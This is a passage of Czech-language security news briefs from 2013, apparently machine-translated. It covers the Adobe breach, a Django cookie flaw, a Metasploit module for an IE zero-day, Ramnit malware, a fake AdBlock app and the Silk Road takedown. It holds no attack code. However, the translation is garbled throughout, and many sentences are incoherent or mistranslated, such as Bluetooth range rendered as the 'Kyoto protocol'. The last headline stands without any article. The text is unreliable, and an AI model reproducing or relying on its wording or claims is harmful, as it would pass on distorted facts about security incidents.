To netrvalo dlouho pro veřejnost využít zranitelnosti je unikly využívat kódu. Ve stejný den, kdy Metasploit vyvinut modul pro zranitelnosti , přišla zpráva, že tři nové kampaně cílené útoku byly pomocí exploitu vektor.

Přes nárůst počtu útoků, Microsoft zřejmě rozhodl se držet harmonogramu pro sporné chybu a ne spravit s out-of-band patch.

Bez ohledu na časové ose podle několika odborníků, mělo by to být náplast problém číslo jedna pro uživatele a IT profesionály v úterý.

"Uživatelé by měli použít opravu co nejdříve," Lamar Bailey, ředitel bezpečnostního výzkumu a vývoje pro zabezpečení sítě společnosti Tripwire, řekl ve čtvrtek.

Ostatní tři kritické aktualizace (Bulletiny 2-4) vyřeší problémy jinde v systému Windows, od Windows XP na Windows 8 a Windows RT.

Mezitím, aktualizace systému Microsoft Office (Bulletiny 5-7) stanoví důležité chyby v SharePoint, Excel a Word, odpovídajícím způsobem.

Všechny tyto chyby zabezpečení by mohlo vést ke vzdálenému spuštění kódu, s výjimkou posledního chyby, ty nejnepatrnější, že řeší informacím chybu s jejím rámci aplikace Silverlight.

To samozřejmě znamená 10 tý rok Patch Microsoft sanace vady Úterý programu. Pohyb - alespoň podle slov bouří Andrew ve středu - vytvoření "velkou vlnu změn" v oblasti informační bezpečnosti od toho bodu na.


Adobe porušena, Acrobat a ColdFusion kód Ukradené Spolu s 2.9m záznamů o zákaznících

4.10.2013 Hacking | Zranitelnosti | Incidenty
Útočníci přístup zákazníků ID, šifrovaných hesel, stejně jako zdrojový kód pro řadu produktů Adobe, Adobe šéf bezpečnosti Brad Arkin oznámil .

Arkin uvedl Adobe spolupracuje s policií na závažnosti porušení, v němž útočníci přístupný zdrojový kód pro Adobe Acrobat, ColdFusion, ColdFusion Builder a případně jiné produkty Adobe.

"Na základě našich poznatků, k dnešnímu dni, nejsme vědomi žádné konkrétní zvýšené riziko pro zákazníky v důsledku tohoto incidentu," Arkin uvedl v prohlášení.

Arkin tzv. útoky na síti Adobe "sofistikovaný", a že informace o 2,9 milionu zákazníků byl odstraněn od společnosti strojů, včetně jména zákazníků, šifrované kreditních a debetních karet, vypršení data a další informace používané v zákaznických objednávek.

"V tuto chvíli se nedomníváme, odstraněné útočníci dešifrovat kreditní nebo debetní karty čísla z našich systémů," říká Arkin. "Hluboce litujeme, že tento incident."

Arkin uvedl Adobe není vědoma žádných zero-day využije použité v útoku, ale doporučuje zákazníkům provozovat pouze podporované verze produktů Adobe a zajistit patch levels jsou aktuální. Řekl, že uživatelé by rovněž měli sledovat pokyny jsou dostupné v Acrobat Enterprise Toolkit a ColdFusion Lockdown Guide.

"Tyto kroky mají pomoci zmírnit útoky na starší, neopravených nebo nesprávně nastavený nasazení produktů společnosti Adobe," řekl Arkin.

Adobe řekl, že je resetování hesla zákazníky , aby se zabránilo další přístup k zákaznických účtů. Retinované zákazníci budou informováni prostřednictvím e-mailu s informacemi o tom, jak změnit svá hesla, Arkin řekl.

Dodal, že Adobe se také pracuje na oznámení zákazníků, jejichž platební karta informace byly přístupné. Oznámení dopisy jdou ven s doplňujícími informacemi týkající se ochrany osobních údajů. Adobe uvedla, že nabízí zákazníkům za jeden rok zdarma úvěrového monitoringu.

Arkin připočítán bezpečnostní zpravodaj Brian Krebs a ​​Alex Holden Hold, bezpečnostní LLC, který je upozorňuje na potenciální problém a pomoci s odpovědí. Krebs dnes oznámila, že se dozvěděla o úniku zdrojového kódu před týdnem, když zjistil, 40GB dat Adobe na stejném serveru, používaného zločinci zapojenými do LexisNexis, Dun & Bradstreet a Kroll porušení letos.

"Hacking týmu serveru obsahovala obrovské repozitáře nezkompilovaný a zkompilovaný kód, který se objevil jako zdrojový kód pro aplikaci ColdFusion a Adobe Acrobat," Krebs napsal dnes.

Krebs řekl, Adobe se domnívá, útočníci popraskané zdrojového kódu úložiště v polovině srpna po přístupu k části sítě, Adobe, která zpracovává transakce kreditní kartou.

Krebs má také screenshot kódu Acrobat z úložiště, včetně kódu od dosud nevydaných vlastností produktu.

"Jsme stále ve fázi brainstorming přijít se způsoby, jak poskytnout vyšší míru jistoty pro integritu našich produktů, a že to bude klíčovou součástí naší reakce," řekl Krebs Arkin. "Těšíme se na malware analýzy a zkoumání různých digitálních aktiv, které máme. Právě teď vyšetřování je opravdu na stopu strouhanky o tom, kde se protivníci dotkl. "


Chyba zabezpečení v Django může povolit Útočníci Přístup k Cookies
4.10.2013 Zranitelnosti | Hacking | Bezpečnost | Incidenty

Chyba zabezpečení ve webovém rámcové Django může usnadnit útočník ukrást uživatele cookie a přihlásit na svých internetových stránkách, i poté, co jste odhlášeni.

Zasedání zneplatnění zranitelnost byla objevena GS McNamara, stejný výzkumník, který vykopal podobnou chybu zabezpečení v Ruby on Rails Web App rámce v září.

Stejně jako Rails, Django umožňuje uživatelům rozhodnout, kde chtějí ukládat data relace uživatele. I když není výchozí, jednou z možností je cookie storage, který McNamara poznámky, ukládá všechny data relace v cookie a podepíše jej.

"Výchozí název souboru cookie relace je" sessionid "bez ohledu na to, zda cookie uloží pouze identifikátor relace, nebo kompletní data relace, hash," McNamara vysvětluje v blogu na své MaverickBlogging.com webových stránkách v pondělí.

McNamara konstatuje, že ve srovnání s Rails, je to trochu složitější určit, kteří uživatelé skladovací zasedání zavedlo, ale pokud uživatel byl pomocí relací využívajících soubory cookie a útočník má přístup k tomuto počítači, i když byl uživatel přihlášen ven, mohli najít, ukrást nebo zachytit, že cookie a snadno získat přístup tomuto uživateli internetových stránkách.

Django je open source webový aplikační framework, který pomáhá uživatelům vytvářet webové aplikace, běží na Python byl naposledy aktualizován jen dva týdny .

McNamara, který sídlí ve Washingtonu, upozornil Django vývojáři o zranitelnosti, ale nezní to jako oprava je na obzoru.

Místo toho se skupina na starosti rámce, Django Software Foundation je, že se rozhodnete upozornit uživatele o bezpečnostních dopadech spojených s relací využívajících soubory cookie.

"Na rozdíl od jiných zasedání backends které udržují server-side záznam každého zasedání a zánik, když se uživatel odhlásí, jsou založené na cookie relace není vyvráceno, když se uživatel odhlásí. Pokud tedy útočník ukradne uživatele cookie, on nebo ona může využít této cookie se přihlásit jako tento uživatel, i když se uživatel odhlásí, "uvádí novou poznámku o tom, jak používat sezení na místě Django .

Když dosáhl Středa, Carl Meyer, přispěvatel Django a členem jejího základního týmu, uznal skupina nemá v úmyslu provádět žádné další změny způsobu zpracování cookie relace skladování a dodal, že "by si vyžádala ověření relace proti serveru -uložené informace o každé žádosti ", a že v tomto okamžiku může uživatel stejně dobře použít server-side relace namísto na základě souboru cookie relace.

Podle Django, je to pro vývojáře vyhodnotit další riziko ukládání cookie relace "a zvážit výhody a nevýhody jejich použití."

McNamara stále doufá, že bude pracovat s Django, pokud jde o zvýšení bezpečnosti svých internetových rámec do budoucna. V e-mailu na Threatpost ve středu tvrdil, že jsou stále přetrvávající problémy s ohledem na [Django je] na základě souboru cookie relace skladování.

"Myslím, že je to riziko, že byl odepsán bez dostatečné dokumentace nebo varování," řekl McNamara.


Za jihokorejských vládních útoků DDoS

3.10.2013 Počítačový útok | Hacking
BERLIN -V posledních několika letech došlo k sérii DDoS útoky a průniky z vládních sítí v Jižní Koreji, které vedly ke ztrátě nesčetné množství dat. Čtyři útoky nebyly propojeny nebo připsat na stejné útočníky, ale tam jsou některé podobnosti v metodách a výsledcích, výzkumník řekl.

Útočníci na jihokorejských vládních míst a banky sahají alespoň červenci 2009 a vyběhnout po incidentu v červnu tohoto roku. Ne všichni z nich byli destruktivní, ale někteří zaměstnán malware, která zničila hlavní spouštěcí záznam infikovaných počítačů a způsobilo, že nepoužitelný. Jiní byli masivní DDoS útoky namířené proti DNS serverů nebo jednotlivých stránek.

V jednom z útoků v březnu 2011 byl škodlivý kapátko stáhnout do zařízení pomocí drive-by download. To kapátko měl časovanou bombu uvnitř ní, která jí dala pokyn zkontrolovat datum a čas a za předem stanovenou hodinu, stáhne a spustí kus malware. Tento aspekt by pak přepsat MBR infikovaný počítač. Existují dva různé vzorky stěračů malware zapojené do útoku, říká Christy Chung ze společnosti Fortinet, jeden pro počítačích se systémem Windows a další pro Unixových strojích. V obou případech byl vymazán MBR, čímž stroje nepoužitelný.

"Ti dva stěrače mají podobné chování," Chung řekl během rozhovoru na konferenci Virus Bulletin 2013 tady ve čtvrtek. "Po restartování zařízení, znamená to, že operační systém nelze najít, protože MBR byl přepsán."

Útoky, které se objevily na 25. června, 2013, používat jinou taktiku, zaměřují dva jmenné servery používané některými z hlavních jihokorejských vládní webové stránky. V tomto případě, malware, který infikoval počítače používají k útoku na jmenné servery přidané komponenty, které měl klíče registru a vytvořené služby, které umožnily, aby malware přežít restart počítače a zůstanou v systému, Chung řekl. Obě cílové DNS servery byly pevně do malwaru a na předem stanovenou dobu malware zahájila DDoS útok na servery. Účinek jako zničující.

"Mnoho z hlavních korejských vládních místech byly k dispozici na nějakou dobu," řekl Čang.

Ačkoli tam byly některé podobnosti v malware používané v útocích, Chung řekl, že je přesvědčen, že stejné útočníci byli za všechny z nich.

"Nechápu to," řekla.


Ramnit Malware Vytvoří FTP síti z počítačů, obětí
3.10.2013 Viry | Kriminalita | Hacking

Červ Ramnit se objevil v roce 2010. Během roku bylo více než osm milionů infikovaných počítačů po celém světě. Zpočátku malware právě soubor infikuje šíří vyměnitelné jednotky. Později se stal lépe poznat za krádež uživatelských dat prostřednictvím prohlížeče injekcí, se zaměřením bankovní nebo hry od uživatele.
Při prohlížení malware nedávno jsme zjistili, nové vzorky s aktivními domén.
20130930 Ramniit-1

Ramnit stále převládá a staré domény jsou pravidelně aktualizovány. Některé z oblastí jsou již "sinkholed" (přesměrován komunikovat pouze s řízenou serverem a ne s jeho škodlivých vývojáři) jinými výzkumníky bezpečnosti.
Na rozdíl od jeho typických charakteristik (malware infikuje .exe / html soubory, hákování procesu aplikace Internet Explorer) Ramnit nastavuje FTP server na oběti stroj. Tento server FTP stává součástí RMNetwork FTP.
Tento server FTP podporuje následující příkazy:
USER, PASS, CWD, CDUP, QUIT, PORT, PASV, TYPE, MODE, RETR, STOR, APPE, REST, RNFR, RNTO, ABOR, DELE, ŘSD, MKD, LIST NLST, SYST, STAT, HELP, NOOP, SIZE, EXEC, a PWD.
20130930 Ramniit-2
Pomocí těchto příkazů útočníky můžete ovládat počítač na dálku, krást jiné citlivé soubory a spustit další škodlivé soubory. Infikované počítače, které jsou firewallem nebo sedět za překlad síťových adres nemůže "spojit" RMNetwork FTP, ale mohou komunikovat s řídicím serverem pomocí TCP port 443 nebo 447 s vlastní šifrování.
20130930 Ramniit-3
Při pohledu na malware v doménových jmen, které se zdají být vytvořeny domény algoritmus generace. Nicméně, tyto aktivní domény napevno v binární. To znamená, že nové binární soubory jsou vytvářeny s malware stavitel nástroj a šíří jiným malwarem, nebo phishing. Tyto domény jsou šifrovány pomocí XOR algoritmu s různými klíči pro každý vzorek.
20130930 Ramniit-4
McAfee zákazníci jsou již chráněni před touto hrozbou.


PRIVATBANK Mobile App ohrožená účtu krádeže

2.10.2013 Mobil | Hacking
Privat24, mobilní bankovní aplikace pro největší ukrajinské komerční banky, obsahuje nedostatečné ověření zabezpečení v jejích aplikací iOS, Android a Windows Phone, které by mohly dát útočník schopnost ukrást peníze z uživatelských účtů po vynechání jeho dvoufaktorové autentizace ochranu.

Proces validace problém vzniká problém ve způsobu, jakým PRIVATBANK nakonfiguroval server, který zpracovává všechny jeho mobilního bankovnictví klientů. Na jeho webových stránkách a na Full Disclosure mailing listu , bezpečnostní výzkumník Eugene Dokukin vysvětluje, že tato chyba zabezpečení mu umožnilo obejít Privat24 je jednorázové heslo (OTP) mechanismus. Nicméně, Dokukin třeba napnout ve druhém útoku s cílem ohrozit bankovní aplikace úplně.

V ideálním případě by Private24 poslat OTP uživatelům pomocí standardní služby hlasových zpráv pokaždé, když on nebo ona přihlásí Nicméně, ve skutečnosti, že banka je pouze zaslání tohoto kódu uživatelům při prvotní instalaci aplikace na svém Android, iOS nebo Windows Mobile zařízení. Jakmile je aplikace nainstalována a ověřena původní OTP na konkrétní zařízení, může uživatel přístup k aplikaci bez překonání této bariéry vstupu znovu. Pro webové stránky PRIVATBANK na straně druhé, banka odešle nový OTP pokaždé, když se uživatel pokusí přihlásit

PRIVATBANK chrání účty svých uživatelů s jejich čísla mobilního telefonu - jako uživatelské jméno či číslem účtu - a heslem. Uživatelé tak budou muset své heslo pro přihlášení s nebo bez OTP. Dokukin útok proto je ošemetný. Útočník by druhý útok, případně s využitím malware nebo nějaké schéma, phishing, aby zjistil uživatelského účtu heslo, než budete moci ohrozit aplikace a potenciálně ukrást peníze.

Dokukin řekl, že kontaktoval PRIVATBANK a ohlásil zranitelnost vůči nim. Potvrdily problém na Dokukin, ale ještě to opravit. Výzkumník dosud vydal všechny technické detaily vysvětluje, jak tento útok funguje, ale říká, že má v úmyslu tak učinit, jakmile PRIVATBANK aktualizuje své aplikace se záplatou, kterým se stanoví chyba.

Threatpost natáhl PRIVATBANK stejně, ale společnost nereagovala na žádost o komentář v době zveřejnění.


Metasploit modul Vydáno pro IE Zero Day

2.10.2013 Zranitelnosti | Hacking | Bezpečnost
Už je to 14 dnů od Microsoft vydal poradní a dočasné zmírnění pro zero-day zranitelnosti v aplikaci Internet Explorer , jeden je aktivně využíván ve volné přírodě a tzv. některými odborníky jako závažnou chybu prohlížeče, jak můžete mít.

Přesto uživatelé protože měl trochu více chránit před útoky těchto účinných než Fix It nástroj, vydané společností Microsoft 17. září. Mezitím využije již strženy řadu japonských médií stránky v útoku zalévání otvorů cílení vládních agentur a výrobců v Japonsku, a byly zapojeny do dalších útoků v Asii sahající dále než první myšlenka. Microsoft má ještě vydat out-of-band patch pro chybu, a Patch Tuesday týden pryč, to je stále více pravděpodobné, uživatelé budou i nadále vystaveny nejméně dalších sedm dní.

Tento přístup funguje, protože k dnešnímu dni známy útoky byly cílené a relativně malém měřítku. Včera však může věci byly urychleno vydáním modulu Metasploit exploitu pro CVE-2013-3893 . Pokud jste zastáncem zákona HD Mooreova , teorie navrhuje Josh Corman z Akamai, která zrcadlí Mooreova zákona výpočetní techniky v tomto neformálním útočník moc roste ve výši Metasploit, pak by se dalo očekávat, že uptick útoků, pomocí tohoto IE chyba.

Microsoft neodpověděl na žádost o komentář, ale minulý týden v reakci na útoky proti japonským médií stránky, Microsoft uvedl, že je i nadále pracovat na vývoji a testování aktualizace zabezpečení, a vyzval zákazníkům nainstalovat Fix It.

Metasploit inženýr Wei Chen napsal v blogpost , že zatímco exploit v současné době vidět v přírodě cílů IE 8 v systému Windows XP a IE 9 v systému Windows 7, je zranitelnost nalézt v IE celou cestu zpět k IE 6 a Metasploit modul by mohl být upraven tak, aby širší záběru cílů.

Microsoft píše ve svém zpravodaji , že vzdálené spuštění zranitelnost je use-po-free chyba v Microsoft vykreslování HTML motor v IE a exploit ve volné přírodě se provádí v javascriptu. To bylo také závislá na DLL Microsoft Office, který nebyl sestaven s rozložení adresového prostoru Náhodnost (ASLR) aktivován. Zneužití, proto obchází ASLR ochranu paměti tím, že spustitelný kód na známou adresu v paměti, Microsoft uvedl. Útočník by mohl využít hardcoded Return orientované programování řetěz označit stránky obsahující shell kódu jako spustitelný soubor.

Útočníci mohou nakazit oběti tím, že láká je na webové stránky hosting škodlivý javascript exploit, nebo špice on-line reklamy se exploitu.

Podle Chena, IE8 na XP verzi exploitu zaměřuje pouze anglické, čínské, japonské a korejské uživatele, na rozdíl od cílů Windows 7.

"Místo toho by exploit zkusit proti všem počítačích se systémem Windows 7 (IE8/IE9) tak dlouho, jak Office 2007 nebo Office 2010 je nainstalována," řekl. "To je proto, že Microsoft Office Nápověda Data Services Module (hxds.dll) mohou být načteny v IE, a je nutné, aby se využilo Return-orientovaného programování s cílem obejít DEP a ASLR a získat spuštění libovolného kódu."

Řada populárních japonských médií stránky byly ohroženy a byly hosting exploit javascript. IE uživatelé navštíví tyto stránky byly přesměrovány do lokalit verzi McRAT vzdáleného přístupu malware, vědci FireEye řekl na 23 září. Malware se používá k exfiltrate dat z počítače oběti a zprávy byly, že vládní úředníci a pracovníci v high-tech a výrobních organizací byla infikována.

FireEye v Darien Kindlund řekl Threatpost, že exploit javascript nejprve určit systém a prohlížeč detaily před podáváním do správné exploit. "V tomto případě, protože exploit pokrývá tolik verzí IE, útočníci nemusí nastavit předchůdce logiku, jako že v javascriptu. Mohou přinést stejný exploit (znovu a znovu) a mít jistotu, že to bude fungovat, "řekl.

FireEye řekl infikovaných počítačů připojit k velení a řízení serveru v Jižní Koreji přes port 443, zpětné provoz je nešifrované, přes jeho použití portu 443, FireEye a dodal, že druhý vzorek shromažďovány rovněž připojen ke stejné jihokorejské IP adresu . FireEye řekl, že také objevil hrst škodlivých domén Upozorňuje i na šetření v Jižní Koreji, který dovolil jim, aby připojení k útoku proti společnosti Bit9 zabezpečení v letošním roce. Stejný e-mailová adresa registrována jihokorejský serveru registrován i doménu použitý v útoku na bezpečnostní společnosti.


Ad Plus místo Adblock Plus

2.10.2013 Hacking | Mobil

To je jeden z těch situacích, kdy uživatel hledá ochranu, ale najde jen ty problémy. Sergio de los Santos , můj přítel, který sdílí se mnou odkaz na falešnou aplikaci, která předstírá, že AdBlock Plus, známé a užitečné Aplikace, že mnozí uživatelé mají ve svých webových prohlížečích. V době jeho stažení, žádost byla aktivní v Google Play a všichni, kdo jej stáhli, místo App blokování non-požadované reklamy na svém webovém prohlížeči, dostal přesný opak-více reklamy a další problémy týkající se soukromí dat.

Říkám to proto, že na analýzu jeho kód, jeden mohl všimnout, že je ve skutečnosti adware. Kaspersky Anti-Virus detekuje jako HEUR: AdWare.AndroidOS.Starsys.b

Ale co přesně to škodlivý aplikace se po instalaci na oběti zařízení? Odpověď je, že dělá mnoho věcí, mezi nimiž jsou: android.permission.READ_LOGS (čte archivní protokoly přístroje, které obsahují citlivé osobní údaje uživatele) android.permission.BLUETOOTH (spolupracuje s bluetooth confirguration s kapacitou až měnit a povolit příchozí spojení s jinými zařízeními, která jsou v rámci Kjótského protokolu dosah) android.permission.INTERNET (poskytuje aplikace nezbytné pro přístup k Internetu) android.permission.RECEIVE_SMS (interaguje s SMS zprávami, čte a dokonce je smazat, aniž souhlas oběti) android.permission.READ_CONTACTS (má přístup ke všem kontaktům v programu) Adware je vydělávat přes RevMob https://www.revmobmobileadnetwork.com stejný RevMob stránka vysvětluje, jak to funguje: "jednoduchý a efektivní reklama jednotka vyzývá uživatele ke stažení zdarma app. Dostanete zaplaceno za kliknutí a instaluje. " Jedná se o použití tvůrci Adblock Plus mají pro tuto falešnou App. Naštěstí, v době psaní tohoto příspěvku, že škodlivý App již byly odstraněny.


FBI sundá miliardového Silk Road on Drug a Hacking Marketplac

2.10.2013 Hacking | Kriminalita
FBI vzala dolů neslavný Silk Road podzemní trh s drogami, zatčení Ross William Ulbricht v San Franciscu včera a nabíjení ho nejen s distribucí nelegálních drog včetně heroinu a LSD, ale také s řadou trestných činů počítačových hackerů.

Ulbricht, který byl znám jako Dread Pirate Roberts, chlubil se v rozhovoru pro Forbes v srpnu, že ho nikdy chycen, ale to se rychle změnilo v polovině včera odpoledne, když FBI zatčen Ulbricht v San Francisco Public Library. Federální státní zástupce v New Yorku podal narkotiky, hacking a poplatky praní špinavých peněz proti Ulbricht, se uvádí, že od ledna 2011 běžel on-line platformu, kde četné obchodníci mohli rozprodávat drogy, kromě malware, jako jsou hesla zloděje, keyloggery a nástroje pro vzdálený přístup, Federální podání řekl.

Na webových stránkách Hedvábné stezky byly zabaveny FBI, společně s miliony dolarů v Bitcoiny, které byly jedinou měnou přijat na internetových stránkách.

Operačně, Hedvábná stezka byla přístupná pouze přes síť Tor, zvláštní agent FBI Christopher Tarbell napsal ve stížnosti podané proti Ulbricht. Anonymita v této síti stále transakce relativně bezpečný, Silk Road vygenerovala 1,2 miliardy dolarů tržeb, soud řekl papíry.

Podobat známé on-line tržiště, Hedvábná stezka nejen nabídl zákazníkům desítky tisíc výpisů pro regulované látky, ale inzerovaných stovky počítačových služeb hackerů. Četné výpisy nabízené služby pro nabourávání do sociálních médií účty, hackování bankomatů nebo spam a phishing seznamů.

"Jeden výpis byl pro" VELKÝM blackmarket seznamu kontaktů, "popsal jako seznam" připojí "k takové" služby "jako" Anonymní bankovních účtů, "" Counterfet Bills (CAD / GBP / EUR / USD) "," Střelné zbraně + Munice "," Stolen Info (CC, Paypal), "a" Hitmen (10 + zemí), "napsal Tarbell.

Dalších 800 výpisy jsou k dispozici také prodejní hacknutý Amazon a Netflix účty, hackerské nástroje a balené hackerské nástroje s kompletní keyloggery, krysy, bankovní trojské koně a další malware, Tarbell napsal.

Silk Road stránkách také inzeroval dostupnost kovaných řidičské průkazy, pasy, sociálního zabezpečení karet, nebo účty, výpisy kreditních karet, evidenci vozidel, pojištění a další dokumentaci, která by umožnila krádeže identity. Na stránkách také hostil wiki a komunitní fórum, kde kupující a prodávající mohou komunikovat, stejně jako pokyny pro provádění transakcí na místě a vyhnout se vymáhání práva, Tarbell v podání uvedl.

"V části fóra označené" Bezpečnost - Tor, Bitcoin, kryptografie, anonymita, bezpečnost atd., "tam jsou četné komentáře od uživatelů, které nabízejí poradenství pro ostatní uživatele o tom, jak by měl nastavit své počítače, aby nedošlo k zanechání stopy na svých systémech jejich činnosti na Hedvábné stezce, "Tarbell napsal.

Tajní agenti, Tarbell psal, byla provedena více než 100 transakcí na místě, nákup léků, hacking a další služby, od prodejců v 10 různých zemích, včetně USA

Soud dokument také řekl, že FBI se nachází několik serverů hosting operace Hedvábná stezka, včetně jednoho v jedné nejmenované zahraniční hostitelská země Silk Road stránky. Tarbell napsal, že FBI požádala obraz tohoto serveru 23. července a od uvedeného dne zjistil, že tam bylo více než 950 tisíc registrovaných uživatelů účty na serveru, a více než 1,2 milionu komunikace odesílané mezi Hedvábné stezky uživatelům na platformě v systému zasílání soukromých zpráv. Tarbell dodal, že v období od února 2011 do 23.července bylo 1,2 milionu transakcí uzavřených na místě s téměř 147.000 unikátních kupující účty a účty dodavatelů 3.877 unikátních výrobních zhruba 1200000000 dolarů (9,5 milionu Bitcoiny).

Soud dokument také poskytuje informace o činnosti Ulbricht je na platformě Silk Road, jak to vyřešit sporné otázky s uživateli, hrozeb z konkurentů, jak byly správci webu řízených a kompenzována, a podrobností o údajnou vraždu, k pronájmu.

Reuters mezitím oznámil, že zatčení došlo letos v Jižní Karolíně, v souvislosti s Hedvábné stezky; Eric Daniel Hughes, Hedvábná stezka zákazník působící pod pseudonymem Casey Jones, byl obviněn z držení drog. DEA také chytil Bitcoiny, které kdysi údajně nákupu léků na webu.


Tři nové útoky a používat IE zero-day exploit

2.10.2013 Zranitelnosti | Hacking
Útočníci jsou i nadále hromadit na kritickém Internet Explorer nulové den, který zůstává unpatched dva týdny poté, to bylo hlásil.

Během posledních dvou týdnů se zdá, že přinejmenším tři oddělené kampaně cílené útoku byly pomocí stejné chyby dříve používaný Dog operace zástupce, kampaň, že likvidace by byla ohrožena japonských sdělovacích prostředků a technologické systémy v polovině září.

Výzkumníci FireEye nejprve objevil DeputyDog kampaň - která zadlužuje CVE-2013-3893 zranitelnost - o něco více než před týdnem. Nyní Slovo přijde, že tři další, nesouvisející kampaně, Taidoor, th3bug a Web2Crew také pomocí stejného exploit.

Web2Crew byl spatřen dne 25. září používáte Internet Explorer zranitelnosti k poklesu vzdáleného přístupu Trojan PoisonIvy do počítačů - některé patří k finanční instituce. Zatímco činem byl umístěn na serveru v Tchaj-wanu, IP adresy z Hongkongu byl použit hostit své velení a řízení server, IP adresu, která FireEye spojené s Web2Crew v průběhu měsíce srpna.

Díky CVE-2013-3892 zranitelnost, Taidoor, druh malware, který byl viděn ohrožení oběti na Tchaj-wanu přes léto se vynořil na tchajwanské vládní webové stránky na 26.září.

Konečně, FireEye si také všiml kampaň škodlivého herec th3bug pomocí zranitelnosti 27.září. To kampaň, stejně jako Web2Crew, rozpoutal PoisonIvy náklad pro ty, kdo navštívil nějaké webové stránky, je ohrožena.

FireEye v Ned Moran a Nart Villeneuve, který psal na blogu o novém kampaní včerejší poznámku, že se jedná o obvyklý jev.

"To není neobvyklé pro APT skupin ruce pryč využije k ostatním, kteří jsou nižší na zero-day potravinového řetězce - zvláště poté, co se stanou veřejně dostupnými exploit," napsal dva.

Zatímco exploit nejsou veřejně dostupné samo o sobě, to jistě stala se více rozšířená v celé počítačové trestné činnosti v podzemí jako pozdní. V pondělí vydal Metasploit exploitu modul pro zranitelnosti, něco, co bude téměř jistě rozjet útoky pomocí chyba.

Zatímco Microsoft vydala fixit nástroj pro chyby v září a nutil starší IE uživatelům stáhnout a použít ji, někteří si mysleli, že by společnost mohla ještě vydat mimo pásmo náplasti opravit chybu. Na tomto místě se společnosti obvyklé Patch vydání naplánováno na úterý příští úterý, zdá se, že uživatelé budou i nadále náchylné nejméně další týden.


Dva mladí lidé zatčení za různé útoky DDoS
30. září 2013. Kriminalita | Hacking
Po masivní DDoS útok proti anti-spam outfit SpamHAUS na začátku tohoto roku, 35-rok-starý holandský občan věřil být Sven Kamphuis, majitel a manažer holandské firmy Cyberbunker hosting, byl zatčen ve Španělsku, protože byl podezřelý z účasti v útoku.

Ale co teprve nyní vyšlo najevo, že současně se 16-letý školák v Londýně byl zadržen v Londýně metropolitní policie kvůli podezření podobné. Ne hodně je známý o tomto chlapci, s výjimkou, že byl propuštěn na kauci a je naplánován se objevit před soudem v průběhu tohoto roku. Podle zprávy od London Evening Standard: "Podezřelý byl nalezen se svými počítačovými systémy otevřené a přihlášeni do různých virtuálních systémů a fór," a měl "velké množství peněz protékající jeho bankovní účet. " Vyšetřovatelé věří, že byl / je členem mezinárodní počítačové trestné činnosti gangu, a jeho zatčení byl zticha tak dlouho, byl pravděpodobně pokus zabránit zbytek skupiny z tváření podezření, že něco není v pořádku. Jako připomínka: DDoS útok namontován proti SpamHAUS na konci března dosáhl asi 300 gigabitů za sekundu ve špičce, což je největší DDoS útok v historii internetu, a podle některých zpráv, což způsobuje dočasné zhoršení služeb se v něm. V Mezitím, další mladík byl zadržen v Německu, protože důstojníci kriminality německé Cyber ​​Competence Center (4C) Státní kriminální policie spojili ho (pravděpodobně neúmyslné) DDoS útok, který ochromil oficiální stránky spolkové země Sasko- Anhalt, a vzal je v režimu offline po dobu několika hodin. Několik týdnů by na internetových stránkách nelze aktualizovat jeho správci, a to byl velký problém, protože server nabízí informace o programech financování. Útok byl ve skutečnosti zaměřena na národní datové centrum v hale , která mimo jiné provozuje výše uvedené webové stránky. Podezřelý byl sledován policií, která na svého bytu, kde našli kopie dat uložených v datovém centru. Podezřelý - 18-rok-starý student z Hamburku - má nesdílí se s policií, co ho namontovat útok. Pokud bude usvědčen počítačové sabotáže a krádeží dat, mohl by skončit s velkým vězením.


Na motivy národní stát řízený kybernetických útoků
30. září 2013. Hacking | Počítačový útok | Zabezpečení
FireEye vydala zprávu, která popisuje jedinečné mezinárodní a místní charakteristiky útoku kampaní vedených kybernetických vládami po celém světě.

"Kybernetické zbraně jsou používány jako výhodu v reálném konfliktu," řekl Kenneth Geers, senior analytik celosvětovou hrozbu, FireEye. "Kraje mají vlastní sadu zbraní kybernetických, které se budou používat ke svému prospěchu, pokud jde o konflikt, nebo na pomoc své spojence. Svět je v kybernetické válce s útoky v každém směru a umístění. Cyber ​​záběry jsou vypalovány v době míru pro okamžité geopolitických konce, stejně jako připravit se na možné budoucí kinetických útoků. Vzhledem k tomu, útoky jsou lokalizované a výstřední, chápání geopolitiky každém regionu může pomoci v obraně kybernetické. " "Největší výzvou pro odstrašení, obrana proti, nebo odplata za kybernetických útoků je problém správně určit pachatele. Balistické rakety mají zpáteční adresy, "řekl profesor John Arquilla na Námořní postgraduální škole. "Ale počítačové viry, červy a popření servisních útoků často pocházejí od za závojem anonymity. Nejlepší šance prorazit tento závoj je dodáván s dovedné míchání forenzních "zpět" hackerských technik, s hlubokou znalostí strategických ostatních kultur a jejich geopolitických cílů. " Kybernetické útoky již osvědčily jako low-cost, high-výplatní cestě hájit národní suverenitu a promítat moc státu. Mezi klíčové charakteristiky pro některé regiony patří: . asijsko-tichomořské domovem pro velké a byrokratické hackerské skupiny, jako například "Komentář Crew", který sleduje cíle ve vysokofrekvenční, brute-force útoky. Rusko / Eastern Europe. Tyto kybernetické útoky jsou technicky vyspělejší a vysoce účinné, jak se vyhnout odhalení. Blízký východ. Tyto zločinci jsou dynamické, často používat kreativitu, podvod a sociální inženýrství, aby přimět uživatele k ohrožení své vlastní počítače. Spojené státy. Nejsložitější, cílené, a důsledně navržena cyber . zaútočit kampaně k dnešnímu dni Kromě toho zpráva spekuluje faktory, které by mohly změnit svět v počítačové oblasti bezpečnosti v blízké-až střednědobém horizontu, včetně:

Výpadek národní kritické infrastruktury, která je zničující dost vynutit hrozbou aktéři přehodnotit sílu kybernetických útoků.
Cyber ​​zbraních nemohou zastavit používání kybernetických útoků.
Ochrana osobních údajů obavy z hranolu lze omezit vládou dotovaných kybernetických útoků ve Spojených státech a po celém světě.
Noví aktéři na scéně Cyber, nejvíce pozoruhodně, Brazílie, Polska a Tchaj-wanu.
Větší důraz na rozvoj úniky metody, které obcházejí detekci.
"Kybernetický útok, při pohledu mimo jeho geopolitickém kontextu, umožňuje velmi malý manévrovací prostor pro právní bránící státu," profesor Thomas Wingfield z Marshall Center. "Falešnou vlajkou operace a samotná povaha internetu, aby taktické přiznání ztrácející hra. Nicméně, strategické uveďte autora - fusing všechny zdroje inteligence na potenciální hrozbu - umožňuje mnohem vyšší míru důvěry a více možností pro rozhodovatele. A strategické atribuce začíná a končí geopolitické analýzy. "


Nejnovější IE 0-day stále unpatched napadá využití je vrátit tři měsíce
30. září 2013. Zranitelnosti | Bezpečnost | Hacking
